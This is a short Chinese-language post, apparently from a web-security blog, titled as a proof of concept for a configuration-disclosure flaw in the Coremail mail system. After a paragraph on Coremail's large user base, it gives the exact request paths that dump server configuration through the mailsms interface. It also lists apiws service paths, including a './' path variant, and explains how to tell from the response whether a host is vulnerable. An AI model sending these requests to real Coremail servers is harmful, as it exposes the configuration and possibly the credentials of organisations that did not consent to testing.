Coremail接口存配置读取漏洞POC

Coremail产品诞生于1999年,经过二十多年发展,如今从亿万级别的运营系统,到几万人的大型企业,都有了Coremail的客户。

截止2019年,Coremail邮件系统产品在国内已拥有10亿终端用户  ,是目前国内拥有邮箱使用用户最多的邮件系统。Coremail今天不但为网易(126、163、yeah)、移动,联通等知名运营商提供电子邮件整体技术解决方案及企业邮局运营服务,还为石油、钢铁、电力、政府、金融、教育、尖端制造企业等用户提供邮件系统软件和反垃圾服务。

 

 

复现手法

1.mailsms

浏览器访问  http://host/mailsms/s?func=ADMIN:appState&dumpConfig=/

出现一些配置文件信息 证明存在该漏洞

出现404或者页面空白 则证明漏洞不存在

 

2.apiws

http://host/apiws/services/

http://host/./apiws/services/

Coremail接口存配置读取漏洞POC_第1张图片

 

 

Coremail接口存配置读取漏洞POC_第2张图片

 

 

 

 

你可能感兴趣的:(web安全,漏洞复现)